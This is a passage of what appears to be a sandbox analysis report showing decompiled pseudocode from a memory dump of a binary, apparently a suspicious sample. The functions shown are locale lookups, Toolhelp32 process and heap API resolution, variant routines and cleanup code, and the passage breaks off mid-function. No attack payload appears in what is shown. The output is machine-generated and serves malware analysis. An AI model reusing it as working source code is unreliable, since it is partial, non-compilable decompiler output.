				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
